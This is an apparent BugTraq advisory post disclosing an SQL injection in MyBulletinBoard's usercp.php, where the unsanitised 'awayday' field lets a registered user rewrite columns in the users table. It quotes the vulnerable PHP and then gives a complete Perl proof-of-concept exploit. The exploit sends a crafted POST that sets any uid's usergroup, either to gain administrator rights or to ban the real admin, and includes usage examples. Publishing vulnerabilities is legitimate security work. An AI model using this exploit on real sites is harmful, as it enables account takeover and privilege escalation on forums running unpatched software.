BugTraq
SQL-Injection in MyBulletinBoard allows attacker to become a board admin. Oct 26 2005 08:01AM
Animal (cOre xaker ru)
Vendor: www.mybboard.com
Version: 1.00 Preview Release 2, RC4 and mayb prior.
Script: usercp.php
Code:
> if($mybb->input['away'] == "yes" && $mybb->settings['allowaway'] !=
> "no")
> {
> [...]
> $returndate =
> $mybb->input['awayday']."-".$mybb->input['awaymonth']."-".$mybb->input['
awayyear'];
> [...]
> $newprofile = array(
> "website" =>
> addslashes(htmlspecialchars($mybb->input['website'])),
> "icq" => intval($mybb->input['icq']),
> "aim" => addslashes(htmlspecialchars($mybb->input['aim'])),
> "yahoo" =>
> addslashes(htmlspecialchars($mybb->input['yahoo'])),
> "msn" => addslashes(htmlspecialchars($mybb->input['msn'])),
> "birthday" => $bday,
> "away" => $away,
> "awaydate" => $awaydate,
> "returndate" => $returndate, // <--- not checked (bday
> too, but anyway)
> "awayreason" =>
> addslashes(htmlspecialchars($mybb->input['awayreason']))
> );
> [...]
> $db->update_query(TABLE_PREFIX."users", $newprofile,
> "uid='".$mybb->user['uid']."'");
So: Attacker can replace "awayday" param by some SQL code and change any
field in _users table.
Changing "usergroup" for his "uid" to 4 makes him an admin. To use
this bug attacker have to be
a registered/awayting_activation user.

Proof of concept: (For PR2 only)
--<-->--<-->--<-->--<-->--<-->--[START]--<-->--<-->--<-->--<-->--<-->--
#!/usr/bin/perl

### MyBB Preview Release 2 SQL-Injection PoC ExPlOiT ###
### ------------------------------------------------ ###
### To use this you have to be registered member on ###
### a target. ###
### ------------------------------------------------ ###
### Glossary: ###
### [MYBBUSER] - name of the field in cookie; ###
### [YOUR_ID] - your uid :) ###
### [ID] - victim uid ###
### Available groups: ###
### 1 - Unregistered / Not Logged In ###
### 2 - Registered ###
### 3 - Super Moderators ###
### 4 - Administrators ###
### 5 - Awayting Activation ###
### 6 - Moderators ###
### 7 - Banned ###
### ------------------------------------------------ ###
### Examples: ###
### 1) TROUBLE --> U need an admin privileges. ###
### USAGE --> mybbpr2.pl -u [MYBBUSER] -i ###
### [YOUR_ID] -g 4 server /mybb/ ###
### 2) TROUBLE --> U need to ban real admin. ###
### USAGE --> mybbpr2.pl -u [MYBBUSER] -i ###
### [ID] -g 7 server /mybb/ ###

use IO::Socket;

$tmp=0;

while($tmp<@ARGV)
{
if($ARGV[$tmp] eq "-u")
{
$mbuser=$ARGV[$tmp+1];
$tmp++;
}
if($ARGV[$tmp] eq "-i")
{
$id=$ARGV[$tmp+1];
$tmp++;
}
if($ARGV[$tmp] eq "-g")
{
$ugr=$ARGV[$tmp+1];
$tmp++;
}
if($ARGV[$tmp] eq "-h")
{
&f_help();
}
$tmp++;
}

$target=$ARGV[@ARGV-2];
$path =$ARGV[@ARGV-1];

if(!$mbuser || !$id || !$ugr)
{
&f_die("Some options aren't specified");
}
print "\r\n Attacking http://$target\r\n";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$target",
PeerPort => "80") || &f_die("Can't connect to $target");
$str="bday1=&bday2=&bday3=&website=&fid3=Undisclosed&fid1=&fid2=&usertit
le=&icq=&aim=&msn=&yahoo=&away=yes&awayreason=Hacking+The+World&awayday=
1-1-2009%27%2C+usergroup=%27$ugr%27+WHERE+uid=%27$id%27+%2F%2A&awaymonth
=1&awayyear=2009&action=do_profile&regsubmit=Update+Profile";

print $sock "POST $path/usercp.php HTTP/1.1\nHost: $target\nAccept:
*/*\nCookie: mybbuser=$mbuser\nConnection: close\nContent-Type:
application/x-www-form-urlencoded\nContent-Length:
".length($str)."\n\n$str\n";
while(<$sock>)
{
if (/Thank you/i) { print "\r\n Looks like successfully exploited\r\n
Just check it.\r\n"; exit(0)}
}
print "\r\n Looks like exploit failed :[\r\n";

#----------------------------------#
# S u B r O u T i N e #
#----------------------------------#

sub f_help()
{
print q(
Usage: mybbpr2.pl <OPTIONS> SERVER PATH
Options:
-u USERKEY mybbuser field from cookie.
-i UID User's uid. (Change group 4 this user)
-g GROUP New usergroup. (1-7)
-h Displays this help.
);
exit(-1);
}
#'
sub f_die($)
{
print "\r\nERROR: $_[0]\r\n";
exit(-1);
}
--<-->--<-->--<-->--<-->--<-->--[EoF]--<-->--<-->--<-->--<-->--<-->--

Found: 1-3 sept 2005. Don't remember.
Updated package is available (i hope).

ByE.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus